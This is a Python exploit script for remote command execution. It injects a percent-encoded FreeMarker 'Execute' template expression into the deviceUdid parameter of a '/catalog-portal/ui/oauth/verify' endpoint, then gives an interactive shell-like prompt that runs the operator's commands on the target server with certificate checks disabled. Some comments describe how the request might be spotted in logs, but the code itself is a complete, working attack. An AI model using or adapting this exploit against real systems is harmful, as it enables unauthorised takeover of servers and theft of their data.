import requests
import sys
import urllib3
def encode_all(string):
    """Percent-encode every character of *string* as ``%hh``.

    Each character's code point is written as lowercase hex, left-padded
    with ``0`` to at least two digits and prefixed with ``%``. Characters
    whose code point exceeds 0xff therefore produce more than two hex
    digits (e.g. ``"\u20ac"`` -> ``"%20ac"``); this mirrors the original
    behaviour and is not a proper UTF-8 URL encoding.
    """
    encoded = [f"%{ord(ch):0>2x}" for ch in string]
    return "".join(encoded)
def main(command):
    """Send one *command* to the target read from ``sys.argv[1]`` and print the reply.

    The target base URL is taken from the first command-line argument, not
    from a parameter. The request is a GET to
    ``/catalog-portal/ui/oauth/verify`` with the ``deviceUdid`` query value
    set to a fully percent-encoded FreeMarker ``Execute`` expression that
    wraps *command* verbatim. The response body is then printed, either
    trimmed to the text between known markers (default) or raw when the
    literal substring ``--raw`` appears anywhere in *command*.

    Args:
        command: Text inserted, unmodified, into the template expression.
            Note that ``--raw`` is only *detected* as a substring; it is not
            stripped, so it is still sent as part of the command.

    Raises:
        IndexError: if ``sys.argv[1]`` is absent.
        requests.exceptions.RequestException: on connection/HTTP errors
            (nothing here catches them).
    """
    userSite = sys.argv[1]
    # Default is to extract the interesting part of the response; "--raw"
    # anywhere in the command switches to printing the whole body.
    parseMode = True
    if "--raw" in command:
        parseMode = False
    # If the user includes a / at the end of the command, remove it
    if userSite.endswith("/"):
        userSite = userSite[:-1]
    # Detection note: from the server side this request is a GET to this path
    # whose deviceUdid value is entirely %-encoded; once decoded it starts
    # with "${" and names freemarker.template.utility.Execute.
    url = userSite + "/catalog-portal/ui/oauth/verify?error=&deviceUdid="
    # This is the payload that will be sent to the server
    # command = input("Enter the command to execute: ")
    # The command is spliced into a double-quoted string literal without any
    # escaping, so a command containing a '"' will break the expression.
    unencoded_payload = '''${"freemarker.template.utility.Execute"?new()("''' + \
        command + '''")}'''
    # URL encode every character in command
    payload = encode_all(unencoded_payload)
    # print("[+] Sending payload: " + payload)
    # This is the headers that will be used to send the payload
    # A fixed browser-like User-Agent and Content-Length: 0 are sent on a GET
    # with no body; from a log-review standpoint this static header set is
    # itself distinctive.
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": "0",
    }
    # This is the request that will be sent to the server
    # Allow insecure requests to bypass the certificate check
    # Ignore the insecure warning
    # verify=False disables TLS certificate validation for this request, so
    # the traffic is exposed to interception; disable_warnings() only hides
    # the InsecureRequestWarning urllib3 would otherwise print.
    urllib3.disable_warnings()
    request = requests.get(url + payload, headers=headers, verify=False)
    # This is the response that will be received from the server
    response = request.text
    # This is the output that will be displayed to the user
    output = ""
    if parseMode:
        # split(...)[1] raises IndexError when the "device id: " marker is
        # missing; the bare except below catches that, but also every other
        # exception (including KeyboardInterrupt) -- NOTE(review): IndexError
        # is the only one expected here.
        try:
            output = response.split("device id: ")[1].split(", device type")[0]
        except:
            # Fallback: text between the begin/end markers, else the whole body.
            if response.find("---begin-message---") != -1:
                output = response.split(
                    "---begin-message---")[1].split("---end-message---")[0]
            else:
                output = response
    else:
        output = response
    # Convert all of the \n to a proper newline
    # The body carries the two characters backslash + 'n' rather than real
    # line breaks; turn them back into newlines before printing.
    output = output.replace("\\n", "\n")
    print(output)
# Script entry point: print usage for "--help", otherwise read commands from
# stdin in a loop and hand each one to main() until "exit" is typed.
# NOTE(review): sys.argv[1] is read without a length check, so running the
# script with no argument raises IndexError instead of printing usage; the
# usage text also names "run.py" although this file is exploit.py.
if __name__ == "__main__":
    if sys.argv[1] == "--help":
        print("Usage: python3 run.py <URL>")
    else:
        # Loop until the user exits the program
        while True:
            command = input("$: ")
            # "exit" is the only way out besides Ctrl-C / EOF (EOFError is
            # not handled here).
            if command == "exit":
                break
            else:
                main(command)